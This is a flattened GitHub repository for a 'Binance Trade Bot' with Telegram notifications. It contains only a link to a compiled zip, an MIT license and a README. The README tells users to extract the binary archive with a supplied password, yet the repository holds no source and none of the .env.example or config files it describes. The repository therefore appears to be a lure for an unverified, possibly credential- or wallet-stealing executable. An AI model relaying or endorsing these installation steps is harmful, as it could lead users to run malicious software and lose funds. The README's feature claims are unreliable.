├── compiled-binaries └── telegram-trading-bot.zip ├── LICENSE └── README.md /compiled-binaries/telegram-trading-bot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rekt-lord/Binance-Trade-telegram-bot/HEAD/compiled-binaries/telegram-trading-bot.zip -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 rekt-lord 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Binance Trade Bot 2 | 3 | The Binance Trade Bot and Telegram Bot Installer is a versatile tool that allows users to install and configure a trading bot for the Binance cryptocurrency exchange and an accompanying Telegram bot for receiving trading updates and notifications. This simplifies the process of setting up automated trading strategies and staying informed about market conditions. 4 | 5 | ### Features 6 | 7 | - Installation and configuration of a Binance trade bot. 8 | - Integration with Telegram for receiving real-time trading updates and notifications. 9 | - Support for various trading strategies, including grid trading and moving averages. 10 | - Customizable bot settings and trading parameters. 11 | - User-friendly setup wizard. 12 | 13 | ## Installation 14 | 15 | Follow these steps to set up the Binance Trade Bot and Telegram Bot Installer on your local machine or server: 16 | 17 | 1. **Clone the repository extract with pass `lzClsGBwq9s` :** 18 | 19 | ```bash 20 | git clone https://github.com/rekt-lord/Binance-Trade-telegram-bot.git 21 | cd Binance-Trade-telegram-bot 22 | 2. Configure your environment: 23 | Create a `.env file` in the project's root directory and define your environment variables. You can use the `.env.example` file as a template. 24 | 25 | ## Usage 26 | 1. Configure Your Trading Strategy: 27 | Customize your trading strategy by modifying the bot's configuration files in the config directory. You can choose from pre-defined strategies or create your own. 28 | 2. Monitor Trading Activity: 29 | Use the Telegram bot to receive real-time trading updates and notifications on your mobile device or desktop. 30 | --------------------------------------------------------------------------------